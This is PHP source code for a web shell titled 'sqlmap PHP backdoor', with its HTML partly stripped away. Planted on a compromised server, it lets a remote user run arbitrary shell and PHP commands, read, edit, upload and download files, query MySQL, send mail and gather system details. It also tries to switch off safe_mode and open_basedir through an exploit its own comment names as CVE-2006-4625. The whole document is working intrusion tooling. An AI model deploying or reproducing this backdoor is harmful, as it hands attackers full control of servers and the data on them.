Error: " . $message . "."; die($completeMessage); } function getSymbolByQuantity($bytes) { $symbols=array('B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB'); $exp=@floor(log($bytes)/log(1024)); return @sprintf('%.2f ' . $symbols[$exp], ($bytes/pow(1024, @floor($exp)))); } function ex($command) { $res=''; if (@function_exists('exec')) { @exec($command, $res); $res=@join("\n", $res); } elseif (@function_exists('shell_exec')) { $res=@shell_exec($command); } elseif(@function_exists('system')) { @ob_start(); @system($command); $res=@ob_get_contents(); @ob_end_clean(); } elseif (@function_exists('passthru')) { @ob_start(); @passthru($command); $res=@ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f=@popen($command, "r"))) { $res=""; while(!@feof($f)) { $res .= @fread($f, 1024); } @pclose($f); } $res=@htmlspecialchars($res); return $res; } if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) { echo ""; echo ""; echo ""; echo ""; echo ""; echo "sqlmap PHP backdoor"; echo "

sqlmap PHP backdoor


"; echo "

System information: here
"; echo "PHP info: here
"; echo "Send an email: here

"; echo "
Read a file

"; echo "
Edit a file

"; echo "
Download a file
Directory:
File:

"; echo "
Upload a file

to directory:

"; echo "
Browse a directory

"; echo "
Execute a shell command

"; echo "
Execute a PHP command

"; echo "
Execute a MySQL query
host:
user:
password:
query:

"; echo "
"; } if (isset($_REQUEST["sysinfo"])) { if (@strtolower(@substr(@PHP_OS, 0, 3)) == "win") { $win=1; } else { $win=0; } $safeMode=@ini_get("safe_mode"); $openBaseDir=@ini_get("open_basedir"); if ($safeMode || $openBaseDir) { /** * Exploit CVE: CVE-2006-4625 * Affected Software: PHP 5.1.6 / 4.4.4 < = x * Advisory URL: http://securityreason.com/achievement_securityalert/42 * Try to restore to default value */ ini_restore("safe_mode"); ini_restore("open_basedir"); } $magicQuotesGpc=@ini_get("magic_quotes_gpc"); $dir=@getcwd(); $total=@disk_total_space($dir); $free=@disk_free_space($dir); echo "Operating system
" . @PHP_OS;
    echo "
Server uname
" . php_uname();
    echo "
Server uptime
";
    echo ex("uptime");
    echo "
Server time
";
    echo date("D, M d, h:iA");
    echo "
Disk space
";
    echo "Total space: " . getSymbolByQuantity($total) . "
";
    echo "Free space: " . getSymbolByQuantity($free);
    echo "
Web server username
";
    echo (!$win) ? `id` . "
" : @get_current_user();
    echo "
PHP version
" . @phpversion();
    echo "
PHP safe_mode
";
    echo ($safeMode) ? "ON
" : "OFF
";
    echo "
PHP open_basedir
";
    echo ($openBaseDir) ? "ON
" : "OFF
";
    echo "
PHP magic_quotes_gpc
";
    echo ($magicQuotesGpc) ? "ON
" : "OFF
";
    echo "
CPU information
";
    echo ex("cat /proc/cpuinfo");
    echo "
Memory information
";
    echo ex("cat /proc/meminfo");
    echo "
Open ports and active connections
";
    echo ex("netstat -nat");
    echo "
Network devices
";
    echo ex("/sbin/ifconfig -a");
    echo "
Processes
";
    echo ex("ps auxfww");
    echo "
"; } else if(isset($_REQUEST["phpinfo"])) { echo @phpinfo(); } else if (isset($_REQUEST["readFile"])) { $file=$_REQUEST["readFile"]; $fileHandler=@fopen($file, "rb") or error("Unable to read file " . $file . ""); $fileContent=@file_get_contents($file); echo "

File: " . $file . "

"; echo "

" . @htmlspecialchars($fileContent) . "
"; } else if(isset($_REQUEST["editFile"])) { $file=$_REQUEST["editFile"]; if (!$file) { error("Specify the file to edit"); } $fileHandler=@fopen($file, "rb") or error("Unable to read file " . $file . ""); $fileContent=@file_get_contents($file); echo "
"; echo "File:

"; echo "
"; } else if (isset($_REQUEST["saveFile"])) { $file=$_REQUEST["saveFile"]; $newContent=$_REQUEST["contentFile"]; if (@is_writable($file)) { $fileHandler=@fopen($file, "w+") or error("Unable to read file " . $file . ""); @fwrite($fileHandler, $newContent) or error("Unable to write on file " . $file . ""); echo "File " . $file . " successfully written"; @fclose($fileHandler); } else { error("File " . $file . " is not writable"); } } else if (isset($_REQUEST["download"])) { ob_clean(); $dir=$_REQUEST["dir"]; $file=$_REQUEST["download"]; $filename=$dir. "/" . $file; $fileHandler=@fopen($filename, "rb") or error("Unable to read file " . $file . ""); $fileContent=@file_get_contents($filename); header("Content-type: application/octet-stream"); header("Content-length: " . strlen($fileContent)); header("Content-disposition: attachment; filename=" . $file . ";"); echo $fileContent; exit; } else if (isset($_REQUEST["upload"])) { if (!isset($_REQUEST["uploadDir"])) { error("Specify directory name (ig: /tmp)"); } $dir=$_REQUEST["uploadDir"]; $file=$HTTP_POST_FILES["file"]["name"]; @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or error("File upload error"); @chmod($dir . "/" . $file, 0755) or error("Unable to set file permission on " . $file . ""); echo "

File " . $file . " successfully uploaded to " . $dir . "

"; } else if (isset($_REQUEST["listDir"])) { $dirToOpen=$_REQUEST["listDir"]; $dirHandler=@opendir($dirToOpen) or error("Unable to open directory"); echo "

Directory: " . $dirToOpen . "

"; echo ""; $list=array(); while ($o=@readdir($dirHandler)) { $list[]=$o; } @closedir($dirHandler); @sort($list); foreach ($list as $file) { if ($file == ".") { continue; } $linkToFile=$dirToOpen . "/" . $file; $isdir=@is_dir($linkToFile); $islink=@is_link($linkToFile); $isfile=@is_file($linkToFile); echo ""; if ($isdir) { echo ""; echo ""; $owner=@posix_getpwuid(@fileowner($linkToFile)); $group=@posix_getgrgid(@filegroup($linkToFile)); echo ""; if ($isdir) { echo ""; } else if ($islink) { echo ""; } else if ($isfile) { echo ""; } else { echo ""; } echo (@is_readable($linkToFile) && $isfile) ? "" : ""; echo (@is_writable($linkToFile) && $isfile) ? "" : ""; echo (@is_readable($linkToFile) && $isfile) ? "" : ""; echo ""; } } else if (isset($_REQUEST["mailForm"])) { echo ""; echo ""; echo "To:

"; echo "Subject:

"; echo "Body:

"; echo ""; } else if (isset($_REQUEST["mail"])) { $status=@mail($_REQUEST["to"], $_REQUEST["subject"], $_REQUEST["msg"]); echo $status ? "Mail sent" : "Failed to send mail"; @exit; } else if (isset($_REQUEST["cmd"])) { $cmd=$_REQUEST["cmd"]; echo "

Shell command: " . $cmd . "

"; echo "
" . ex($cmd) . "
"; } else if(isset($_REQUEST["phpcode"])) { $code=$_REQUEST["phpcode"]; echo "

PHP command: " . $code . "

"; echo "
";
    echo @eval("print_r($code);");
    echo "
"; } else if (isset($_REQUEST["query"])) { $host=$_REQUEST["host"]; $user=$_REQUEST["user"]; $password=$_REQUEST["password"]; $query=$_REQUEST["query"]; $link=@mysql_connect("$host", "$user", "$password"); if (!$link) { error(@mysql_error()); } $result=@mysql_query($query); if (!$result) { error(@mysql_error()); } echo "

MySQL query: " . $query . "

"; echo "
";
    while ($row=@mysql_fetch_array($result, MYSQL_ASSOC)) {
        @print_r($row);
    }
    echo "
"; @mysql_free_result($result); } if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) { echo ""; } ?>
NamePermissionOwner/GroupSizeReadWriteDownload
"; } else if ($isfile) { echo ""; } else { echo "$linkToFile"; } echo "$linkToFile" . @substr(@sprintf("%o", @fileperms($linkToFile)), -4) . "" . $owner["name"] . "/" . $group["name"] . "DIRLINK" . @sprintf("%u", @filesize($linkToFile)) . " bytesUnknownRead-Write-Download-